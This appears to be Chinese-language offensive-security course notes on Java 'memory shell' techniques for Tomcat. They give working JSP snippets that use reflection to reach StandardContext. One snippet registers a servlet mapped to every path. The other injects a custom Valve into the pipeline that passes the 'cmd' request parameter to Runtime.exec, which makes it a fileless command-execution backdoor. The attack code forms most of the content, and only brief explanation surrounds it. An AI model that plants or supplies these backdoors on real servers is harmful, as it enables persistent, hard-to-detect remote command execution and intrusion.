JAVA攻防-内存马技术手搓代码调试反射Tomcat中间件Servlet路由器Valve管道器

知识点：
Java攻防-内存马技术-手搓代码&Tomcat&Servlet&Valve

演示案例-Java攻防-内存马技术-手搓代码&Tomcat&Servlet&Valve

Servlet内存马

0、添加依赖，方便后续IDA调试分析

<dependency><groupId>org.apache.tomcat</groupId><artifactId>tomcat-catalina</artifactId><version>9.0.68</version></dependency>

1、Servlet使用

web.xml配置或@WebServlet()等。<servlet><servlet-name>servletDemo</servlet-name><servlet-class>com.test.servletDemo</servlet-class></servlet><servlet-mapping><servlet-name>servletDemo</servlet-name><url-pattern>/demo</url-pattern></servlet-mapping>

2、动态分析

参考：https://cloud.tencent.com/developer/article/2130045

编写一个继承于servlet的类，并重写doGet或其他方法， 反射调用request类，StandardContext类获取context， 调用createWrapper方法后设置基于web.xml的配置信息， addChild添加第一个配置，addServletMappingDecoded添加第二个配置

web.xml配置才是重点，如何通过反射技术往这里添加配置。

3、内存马实现

<% //获取StandardContext#contextField reqF=request.getClass().getDeclaredField("request");reqF.setAccessible(true);Request req=(Request)reqF.get(request);StandardContext context=(StandardContext)req.getContext();//创建wrapper并写入servlet信息 Wrapper wrapper=context.createWrapper();wrapper.setName("testservlet");wrapper.setServletClass(HelloServlet.class.getName());wrapper.setServlet(new HelloServlet());//添加wrapper并添加路由信息 context.addChild(wrapper);context.addServletMappingDecoded("/*","testservlet");%>

Tomcat-Valve内存马

Valve译文为阀门。在Tomcat中，四大容器类StandardEngine、StandardHost、StandardContext、StandardWrapper中，都有一个管道(PipeLine)及若干阀门(Valve)。它们各自拥有独立的管道PipeLine，当各个容器类调用getPipeLine().getFirst().invoke(Request req, Response resp)时，会首先调用用户添加的Valve，最后再调用缺省的Standard-Valve，形象地打个比方，供水管道中的各个阀门，用来实现不同的功能，比方说控制流速、控制流通等等。

0、添加依赖，方便后续IDA调试分析

<dependency><groupId>org.apache.tomcat</groupId><artifactId>tomcat-catalina</artifactId><version>9.0.68</version></dependency>

1、Valve使用

public class TestVavle extends ValveBase{@Override public void invoke(Request request, Response response)throws IOException, ServletException{String cmd=request.getParameter("cmd");if(cmd==null){getNext().invoke(request, response);}else{Runtime.getRuntime().exec(cmd);}}}

-全局模板 所有应用都继承相同的 Valve 配置，可以修改 Tomcat 的全局context.xml（位于$CATALINA_BASE/conf/context.xml） -自定义部署 在 src/main/webapp/META-INF 目录下创建context.xml文件

2、动态分析

参考：https://mp.weixin.qq.com/s/kfN6uU3A-jR72fyK8epnGw

编写一个继承于ValveBase的类，并重写Invoke方法， 反射调用request类，StandardContext类获取context 随后调用相应容器实例的getPipeline方法后addValve添加

3、内存马实现

<% //反射调用request类 Field reqF=request.getClass().getDeclaredField("request");reqF.setAccessible(true);Request req=(Request)reqF.get(request);//反射调用StandardContext类获取context StandardContext context=(StandardContext)req.getContext();//调用getPipeline Pipeline pipeline=context.getPipeline();//传入testVavle类 TestVavle testVavle=new TestVavle();pipeline.addValve(testVavle);%>